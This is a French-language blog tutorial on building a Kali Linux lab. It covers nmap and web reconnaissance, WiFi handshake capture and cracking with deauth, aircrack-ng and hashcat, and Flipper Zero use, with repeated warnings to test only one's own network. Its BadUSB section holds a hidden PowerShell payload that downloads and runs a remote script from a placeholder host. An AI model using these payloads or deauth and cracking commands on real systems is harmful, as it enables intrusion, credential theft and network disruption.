Menu
À propos Services Parcours Travaillons ensemble
Linux terminal with code
Sécurité Mar 7, 2026 • 25 min de lecture

Kali Linux Fundamentals: Build Your Hacking Laboratory

Set up Kali Linux, master nmap reconnaissance, capture WiFi handshakes with aircrack-ng, and connect your Flipper Zero to professional penetration testing workflows.

Partager:
Lee Foropoulos

Lee Foropoulos

25 min de lecture

Le Chemin du Hacker : Une Serie en 5 Parties

Partie 1 : IntroductionPartie 2 : Maitrise du FlipperPartie 3 : Fondamentaux de KaliPartie 4 : ExploitationPartie 5 : L'Audit Complet

Dans les Parties 1 et 2, tu as clone des cartes, analyse des frequences radio et compris pourquoi la plupart de la "securite" n'est que du theatre. Tu as vu les vulnerabilites de l'exterieur. Maintenant tu entres a l'interieur et tu les vois du point de vue de l'attaquant.

Kali Linux est la distribution standard de l'industrie pour les tests de penetration. Elle est pre-chargee avec plus de 600 outils de securite. Ca peut paraitre ecrasant. La plupart des tutoriels te jettent dans le grand bain avec des commandes que tu ne comprends pas et sans contexte sur pourquoi elles sont importantes.

On fait les choses differemment. A la fin de cet article, tu auras un labo fonctionnel, tu comprendras la reconnaissance reseau a un niveau fondamental et tu captureras ton propre handshake WiFi. Chaque etape s'appuie sur la precedente.

La plupart des tutoriels te jettent dans le grand bain avec des commandes que tu ne comprends pas et sans contexte sur pourquoi elles sont importantes. Ici, chaque etape s'appuie sur la precedente.

Partie 1 : Construire Ton Laboratoire

Les testeurs de penetration professionnels n'executent pas Kali sur leur machine principale. Ils utilisent des environnements isoles qui peuvent etre reinitialises, snapshotes et detruits sans affecter leur systeme principal. Tu feras pareil.

Option A : Machine Virtuelle (Recommandee pour l'Apprentissage)

Une machine virtuelle te donne l'environnement d'apprentissage le plus sur. Tu peux faire des snapshots de ta progression, commettre des erreurs et revenir en arriere instantanement.

Ce Dont Tu Auras Besoin

  • Machine hote : 16 Go+ de RAM, 50 Go+ d'espace disque libre, CPU moderne avec support de virtualisation
  • Logiciel de virtualisation : VirtualBox (gratuit) ou VMware Workstation Player (gratuit pour usage personnel)
  • Kali Linux : VM officielle pre-construite depuis kali.org

Projet : Configuration de la VM Kali

Temps : 30-45 minutes

Etapes :

  1. Telecharge l'image de la VM Kali pour ton hyperviseur (VirtualBox ou VMware)
  2. Extrais l'archive telechargee (7-Zip recommande pour Windows)
  3. Importe la VM dans ton hyperviseur
  4. Configure les ressources : 4 Go de RAM minimum (8 Go recommandes), 2+ coeurs CPU
  5. Active l'adaptateur reseau en mode "Bridged" pour un acces reseau complet
  6. Demarre la VM et connecte-toi avec les identifiants par defaut : kali / kali
  7. Ouvre le terminal et execute : sudo apt update && sudo apt full-upgrade -y
  8. Cree un snapshot nomme "Fresh Install" pour une recuperation facile

Verification du succes : Tu peux ouvrir un terminal, executer whoami et voir kali.

Option B : Materiel Dedie (Pour une Pratique Serieuse)

Une fois que tu es a l'aise avec Kali, le materiel dedie supprime la surcharge de la VM et permet un acces complet au materiel, ce qui est essentiel pour les tests sans fil.

Recommandations Materielles

Option budgetThinkPad X230/T430 d'occasion (100-150$), WiFi Intel remplace par Atheros AR9285
Option moderneFramework Laptop avec module WiFi compatible Linux
Capteur dedieRaspberry Pi 5 4 Go avec adaptateur externe Alfa AWUS036ACH

Pour l'instant, une VM est parfaite. Le materiel dedie devient important quand tu as besoin du mode moniteur pour les tests sans fil (couvert plus loin dans cet article).

Option C : USB Live (Zero Persistance)

Un USB live execute Kali directement sans installation. Tout disparait quand tu eteins. Utile pour tester sur differents materiels, mais tu perdras ton travail a chaque session sauf si tu crees une partition persistante.

bash# Create bootable USB on Linux/Mac
sudo dd if=kali-linux-*.iso of=/dev/sdX bs=4M status=progress
# Replace sdX with your USB device (check with 'lsblk')
# On Windows: Use Rufus or balenaEtcher

dd Detruit les Donnees

La commande dd ecrit directement sur le disque sans confirmation. Verifie trois fois le nom de ton peripherique. Ecrire sur le mauvais peripherique effacera completement ce disque.

Kali Linux terminal with security tools running
Un environnement Kali Linux correctement configure est la base de tout test de penetration professionnel.

Partie 2 : L'Etat d'Esprit Terminal

Avant de toucher aux outils de securite, tu dois etre a l'aise dans le terminal. Ce n'est pas optionnel. L'interface graphique existe dans Kali, mais le vrai travail se fait en ligne de commande.

bash# Know where you are
pwd                    # Print working directory

# Move around
cd /home/kali          # Go to home directory
cd ..                  # Go up one level
cd -                   # Go to previous directory

# See what's here
ls                     # List files
ls -la                 # List all files with details
ls -lah                # Human-readable sizes

# Read files
cat filename           # Display entire file
less filename          # Scrollable view (q to quit)
head -n 20 filename    # First 20 lines
tail -f filename       # Follow file in real-time (logs)

Escalade de Privileges

Beaucoup d'outils de securite necessitent un acces root. Dans Kali, sudo te donne des privileges root temporaires.

bashsudo command           # Run single command as root
sudo -i                # Start root shell (be careful)
whoami                 # Check current user
id                     # Show user and group IDs

Root avec Responsabilite

Executer en tant que root signifie aucun filet de securite. Une faute de frappe comme rm -rf / detruira tout. Kali moderne empeche cette commande specifique, mais le principe reste : comprends ce que tu executes avant de l'executer.

Gestion des Processus

bashps aux                 # All running processes
top                    # Real-time process viewer
htop                   # Better process viewer (install if needed)

# Control processes
ctrl+c                 # Stop current process
ctrl+z                 # Suspend process
bg                     # Resume in background
fg                     # Bring to foreground

# Kill processes
kill PID               # Graceful termination
kill -9 PID            # Force kill (last resort)

Commandes Reseau

baship a                   # Show network interfaces
ip route               # Show routing table
ping -c 4 8.8.8.8     # Test connectivity
curl ifconfig.me       # Your public IP

# DNS lookups
nslookup google.com
dig google.com

Projet : Orientation Terminal

Temps : 15 minutes

Taches :

  1. Trouve ton adresse IP sur le reseau local avec ip a
  2. Identifie ta passerelle par defaut avec ip route
  3. Fais un ping a ta passerelle pour confirmer la connectivite
  4. Liste tous les fichiers dans /etc tries par date de modification : ls -lt /etc | head
  5. Lis les 50 premieres lignes de /etc/passwd : head -n 50 /etc/passwd

Objectif : Tu devrais pouvoir naviguer, verifier l'etat du reseau et lire des fichiers sans reflechir.

Partie 3 : Reconnaissance Reseau avec Nmap

Nmap (Network Mapper) est l'outil le plus important que tu apprendras. Il decouvre les hotes, identifie les services, detecte les systemes d'exploitation et cartographie la topologie du reseau. Tout le reste repose sur la sortie de nmap.

Ton Premier Scan

Scannons ton propre reseau. D'abord, identifie la plage de ton reseau :

bash# Find your local IP and subnet
ip a | grep inet
# Look for something like: inet 192.168.1.100/24
# The /24 means your network is 192.168.1.0-255
bash# Basic discovery scan (your network only)
sudo nmap -sn 192.168.1.0/24

# What this does:
# -sn = ping scan (no port scanning, just host discovery)
# /24 = scan all 256 addresses in this subnet

Tu verras une sortie comme :

textNmap scan report for 192.168.1.1
Host is up (0.0025s latency).
MAC Address: AA:BB:CC:DD:EE:FF (Manufacturer Name)

Nmap scan report for 192.168.1.50
Host is up (0.0042s latency).
MAC Address: 11:22:33:44:55:66 (Another Manufacturer)

Ce premier scan te dit : "Ces appareils existent sur mon reseau." Maintenant posons des questions plus profondes.

Detection de Services

Une fois que tu sais quels hotes existent, tu veux savoir quels services ils executent.

bash# Scan a single target for open ports and services
sudo nmap -sV 192.168.1.1
# -sV = Version detection (probe open ports for service info)

Sortie courante :

textPORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 8.4p1
80/tcp   open  http     nginx 1.18.0
443/tcp  open  ssl/http nginx 1.18.0

Detection du Systeme d'Exploitation

bash# Detect OS (requires root)
sudo nmap -O 192.168.1.1

# Combined scan: OS detection + service versions + default scripts
sudo nmap -A 192.168.1.1

Comprendre les Etats des Ports

Nmap rapporte les ports dans plusieurs etats :

  • open - L'application accepte activement les connexions. C'est ce que les attaquants recherchent.
  • closed - Le port est accessible mais aucune application n'ecoute. L'hote est actif mais il n'y a rien.
  • filtered - Un pare-feu ou filtre bloque la sonde. Impossible de determiner si c'est ouvert ou ferme.
  • unfiltered - Le port est accessible mais nmap ne peut pas determiner s'il est ouvert ou ferme.

Types de Scan et Furtivite

bash# TCP Connect scan (default, noisy but reliable)
sudo nmap -sT target

# SYN scan (stealthier, default with root)
sudo nmap -sS target

# UDP scan (slow but important - many services use UDP)
sudo nmap -sU target

# Scan all 65535 ports (thorough but slow)
sudo nmap -p- target

# Scan specific ports
sudo nmap -p 22,80,443,8080 target

# Top 1000 common ports (default behavior)
sudo nmap target

Moteur de Scripts Nmap (NSE)

NSE etend nmap avec des scripts specialises pour la detection de vulnerabilites, l'enumeration de services et plus encore.

bash# Run default safe scripts
sudo nmap -sC target

# Check for vulnerabilities
sudo nmap --script vuln target

# SMB enumeration (Windows shares)
sudo nmap --script smb-enum-shares target

# HTTP enumeration
sudo nmap --script http-enum target

# List available scripts
ls /usr/share/nmap/scripts/ | head -20

Projet : Cartographie Ton Reseau

Temps : 30 minutes

Prerequis : Connaitre la plage de ton reseau depuis ip a

  1. Decouvre tous les hotes : sudo nmap -sn TON_RESEAU/24
  2. Liste les hotes decouverts et leurs adresses MAC
  3. Choisis ton routeur (generalement .1) et execute : sudo nmap -sV -sC TON_ROUTEUR
  4. Identifie tous les ports ouverts et services sur ton routeur
  5. Execute sudo nmap -A TON_ORDINATEUR pour voir ce que ta propre machine expose

Documente : Cree un fichier texte listant chaque appareil, son IP, MAC et services. C'est ta carte reseau.

Ne Scanne Que les Reseaux Qui T'Appartiennent

Scanner des reseaux sans autorisation est illegal dans la plupart des juridictions. Meme un simple scan nmap peut etre considere comme un acces non autorise. Limite-toi a ton propre reseau, ton propre equipement et les reseaux ou tu as une permission ecrite explicite.

Partie 4 : Reconnaissance Web

Ton scan nmap a probablement trouve des services HTTP (ports 80, 443, 8080). Voyons ce qui tourne la-dessus.

Whatweb : Identification Rapide de Services

bash# Identify web technologies
whatweb http://192.168.1.1

Exemple de sortie :

texthttp://192.168.1.1 [200 OK] Country[RESERVED][ZZ],
HTTPServer[nginx/1.18.0], IP[192.168.1.1],
Title[Router Admin], nginx[1.18.0]

Nikto : Scanner de Vulnerabilites Web

bash# Scan for common web vulnerabilities
nikto -h http://192.168.1.1

# This checks for:
# - Outdated server software
# - Dangerous files/CGIs
# - Misconfigurations
# - Default credentials

Enumeration de Repertoires : Qu'est-ce Qui Est Cache ?

Les serveurs web ont souvent des repertoires non lies depuis la page principale : panneaux d'administration, fichiers de configuration, fichiers de sauvegarde.

bash# Gobuster: directory brute-forcing
gobuster dir -u http://192.168.1.1 -w /usr/share/wordlists/dirb/common.txt

Decouvertes courantes :

text/admin   (Status: 301)
/backup  (Status: 403)
/config  (Status: 200)
/login   (Status: 200)

Emplacement des Wordlists

Kali inclut des wordlists completes dans /usr/share/wordlists/. Les repertoires les plus courants : dirb/, dirbuster/, rockyou.txt (mots de passe) et seclists/ (collection complete).

Projet : Audite l'Interface Web de Ton Routeur

Temps : 20 minutes

  1. Execute whatweb http://IP_DE_TON_ROUTEUR pour identifier le serveur
  2. Execute nikto -h http://IP_DE_TON_ROUTEUR pour verifier les vulnerabilites
  3. Execute gobuster dir -u http://IP_DE_TON_ROUTEUR -w /usr/share/wordlists/dirb/small.txt
  4. Visite les repertoires decouverts dans un navigateur
  5. Note tout panneau d'administration, numero de version ou decouverte interessante

Decouverte courante : Pages d'administration du routeur exposees avec des identifiants par defaut.

Server room with network infrastructure
La reconnaissance reseau revele la topologie complete d'un environnement cible, des routeurs aux services caches.

Partie 5 : Reconnaissance Sans Fil

C'est la que les choses deviennent interessantes. Les reseaux WiFi emettent en permanence, et avec les bons outils, tu peux capturer des handshakes d'authentification : l'echange chiffre qui se produit quand un appareil se connecte.

Exigences Materielles

Ton WiFi integre ne fonctionnera probablement pas pour ca. Tu as besoin d'un adaptateur qui supporte le mode moniteur et l'injection de paquets. Recommandes : Alfa AWUS036ACH (~50$) ou Alfa AWUS036ACM (~45$). Ils fonctionnent directement avec Kali.

Comprendre le Mode Moniteur

Le mode WiFi normal ("mode gere") ne recoit que les paquets adresses a ton appareil. Le mode moniteur capture tous les paquets a portee, le trafic de chaque appareil sur le canal.

bash# Check your wireless interfaces
iwconfig
# Look for your adapter (often wlan0 or wlan1)

# Kill interfering processes
sudo airmon-ng check kill

# Enable monitor mode
sudo airmon-ng start wlan0
# Your interface is now wlan0mon

Scanner les Reseaux

bash# Start capturing wireless traffic
sudo airodump-ng wlan0mon

# You'll see:
# BSSID  = Router MAC address
# PWR    = Signal strength (higher = closer)
# CH     = Channel
# ENC    = Encryption (WPA2, WPA3, OPN)
# ESSID  = Network name

# Press Ctrl+C to stop

Ce que tu vois, c'est chaque reseau WiFi a portee, leurs parametres de securite et souvent les appareils qui y sont connectes. C'est ce qu'un war driver voit en scannant les quartiers.

Capturer un Handshake

Quand un appareil se connecte a un reseau WPA2, il y a un handshake a quatre voies. Si tu captures ce handshake, tu peux tenter de cracker le mot de passe hors ligne.

bash# Focus on your target network (your own network!)
sudo airodump-ng -c CHANNEL --bssid ROUTER_MAC -w capture wlan0mon
# -c CHANNEL = Target's channel from previous scan
# --bssid = Target router's MAC address
# -w capture = Save to files starting with "capture"

# Now wait for a device to connect...

# Or force a reconnection (on YOUR network only):
# In a new terminal:
sudo aireplay-ng --deauth 5 -a ROUTER_MAC wlan0mon
# This sends 5 deauth packets, disconnecting clients
# They automatically reconnect, generating a handshake

Quand tu captures un handshake, airodump-ng affiche [ WPA handshake: XX:XX:XX:XX:XX:XX ] dans le coin superieur droit.

Les Attaques Deauth Sont Illegales

Envoyer des paquets de deauthentification a des reseaux qui ne t'appartiennent pas est un crime federal sous le Computer Fraud and Abuse Act (aux Etats-Unis) et des lois similaires ailleurs. Teste uniquement sur ton propre reseau. L'objectif est de comprendre la vulnerabilite, pas d'attaquer les autres.

Cracker le Handshake

Avec un handshake capture, tu peux tenter de cracker le mot de passe hors ligne avec une wordlist :

bash# Crack using a wordlist
aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap

# If the password is in the wordlist, you'll see:
# KEY FOUND! [ password123 ]

# For stronger passwords, use hashcat (GPU-accelerated)
# First, convert capture format:
cap2hccapx capture-01.cap capture.hccapx

# Then crack with hashcat:
hashcat -m 22000 capture.hccapx /usr/share/wordlists/rockyou.txt
14M+
De vrais mots de passe issus de fuites de donnees reelles sont inclus dans rockyou.txt, la wordlist par defaut utilisee pour cracker les handshakes WiFi captures.

Verification de Realite sur la Force des Mots de Passe

rockyou.txt contient plus de 14 millions de mots de passe issus de fuites de donnees reelles. Si ton mot de passe WiFi est "password123" ou "ete2024" ou le nom de ton chien, il est crackable en secondes. Un mot de passe aleatoire de plus de 12 caracteres prendrait des millions d'annees a cracker par force brute.

Projet : Teste la Securite de Ton WiFi

Temps : 45 minutes

Prerequis : Adaptateur WiFi externe avec support du mode moniteur

  1. Active le mode moniteur : sudo airmon-ng start wlan0
  2. Scanne les reseaux : sudo airodump-ng wlan0mon
  3. Note le canal et BSSID de ton propre reseau
  4. Capture sur ton canal : sudo airodump-ng -c CHANNEL --bssid TON_BSSID -w monwifi wlan0mon
  5. Reconnecte un appareil a ton WiFi (ou utilise deauth sur TON reseau)
  6. Confirme la capture du handshake
  7. Teste contre rockyou.txt : aircrack-ng -w /usr/share/wordlists/rockyou.txt monwifi-01.cap

Resultat : Si ton mot de passe a ete trouve, change-le immediatement pour quelque chose d'aleatoire et long (plus de 20 caracteres).

Partie 6 : Connecter Ton Flipper Zero

Tu te souviens de toutes ces captures de la Partie 2 ? Integrons-les a ton flux de travail Kali.

Transfert de Fichiers

bash# Connect Flipper via USB
# It appears as a mass storage device

# Mount if not auto-mounted
sudo mount /dev/sda1 /mnt/flipper

# Your captures are in:
/mnt/flipper/subghz/       # Sub-GHz captures
/mnt/flipper/nfc/          # NFC dumps
/mnt/flipper/infrared/     # IR captures
/mnt/flipper/lfrfid/       # 125kHz RFID
/mnt/flipper/badusb/       # BadUSB scripts

Analyser les Dumps NFC

bash# Install libnfc tools
sudo apt install libnfc-bin mfoc mfcuk

# Flipper saves NFC as .nfc text format
# Convert to binary for analysis:
python3 flipper_nfc_to_mfd.py card.nfc card.mfd

# Analyze MIFARE Classic dump
hexdump -C card.mfd | less

Analyse Sub-GHz

bash# Flipper's .sub files are text-based
cat garage_door.sub

# Contains:
# - Frequency (315MHz, 433MHz, etc.)
# - Protocol or RAW data
# - Timing information

# For deeper RF analysis, use:
# - Universal Radio Hacker (URH)
# - GNU Radio
# - rtl_433 (with SDR hardware)

Developpement BadUSB

Cree des payloads BadUSB dans Kali, teste-les sur le Flipper :

bash# Flipper uses DuckyScript-compatible syntax
# Create payload on Kali:
cat > kali_connect.txt << 'EOF'
DELAY 1000
GUI r
DELAY 500
STRING powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://YOUR_KALI_IP:8000/shell.ps1')"
ENTER
EOF

# Host the payload from Kali:
python3 -m http.server 8000

# Copy to Flipper's badusb folder
cp kali_connect.txt /mnt/flipper/badusb/

Les Payloads BadUSB Sont Puissants

Ces scripts s'executent automatiquement une fois branches. Un payload malveillant pourrait installer des backdoors, voler des identifiants ou detruire des donnees en quelques secondes. Utilise-les uniquement sur tes propres machines pour les tests. Ne laisse jamais ton Flipper la ou quelqu'un d'autre pourrait le brancher.

Partie 7 : Documentation et Flux de Travail

Les testeurs de penetration professionnels ne font pas que lancer des outils. Ils documentent tout. Une bonne documentation separe les amateurs des professionnels.

Prise de Notes avec CherryTree

bash# Install CherryTree (hierarchical note-taking)
sudo apt install cherrytree

# Organize notes by:
# - Target/network
# - Reconnaissance
# - Enumeration
# - Vulnerabilities
# - Exploitation attempts
# - Post-exploitation

Sauvegarder la Sortie Nmap

bash# Save in all formats
sudo nmap -sV -sC -oA scan_results target

# Creates:
# scan_results.nmap (human-readable)
# scan_results.xml  (parseable)
# scan_results.gnmap (greppable)

Journalisation de Session

bash# Log entire terminal session
script session_$(date +%Y%m%d_%H%M%S).log

# Now every command and output is recorded
# Type 'exit' to stop logging

Le Chemin du Hacker

Une serie en 5 parties qui te fait passer de curieux a capable.

Partie 1 : Introduction Partie 2 : Maitrise du Flipper Partie 3 : Fondamentaux de Kali ✓ Partie 4 : Exploitation Partie 5 : Audit Complet

Checklist de la Partie 3

☐ Configuration du Lab : VM Kali fonctionnelle, mise a jour, snapshot sauvegarde

☐ Terminal : A l'aise avec la navigation, les permissions, le controle des processus

☐ Nmap : Reseau cartographie, services identifies, routeur scanne

☐ Recon Web : Interface web du routeur analysee avec whatweb/nikto

☐ Sans Fil : Mode moniteur active, reseaux scannes

☐ Handshake : Handshake WiFi personnel capture et teste

☐ Flipper : Fichiers transferes, flux de travail compris

☐ Documentation : Notes organisees, scans sauvegardes

Plan d'Action Fondamentaux Kali 0/6

Et Ensuite

Tu as construit ton laboratoire et appris la phase de reconnaissance. Tu peux decouvrir des hotes, identifier des services et capturer des handshakes sans fil. Tu comprends ce que les attaquants voient quand ils regardent un reseau.

Dans la Partie 4, on passe de la reconnaissance a l'exploitation. Tu apprendras :

  • Metasploit Framework, le couteau suisse de l'exploitation
  • Les flux de travail courants d'exploitation de vulnerabilites
  • Les techniques de post-exploitation : ce qui se passe apres l'acces initial
  • L'escalade de privileges : passer d'utilisateur normal a administrateur
  • Le pivoting : utiliser un systeme compromis pour en attaquer d'autres

La reconnaissance te dit ou sont les portes. L'exploitation t'apprend a les traverser.

Tu as cartographie le territoire. Maintenant tu apprends a y naviguer. La Partie 4 te fait passer d'observateur a operateur.

On se retrouve dans la Partie 4.

How was this article?

Partager

Link copied to clipboard!

You Might Also Like

Lee Foropoulos

Lee Foropoulos

Business Development Lead at Lookatmedia, fractional executive, and founder of gotHABITS.

🔔

Ne manquez aucun article

Recevez une notification lors de la publication de nouveaux articles. Aucun courriel requis.

Vous verrez une banniere sur le site quand il y a un nouvel article, plus une notification navigateur si vous autorisez.

Notifications du navigateur uniquement. Pas de spam, pas de courriel.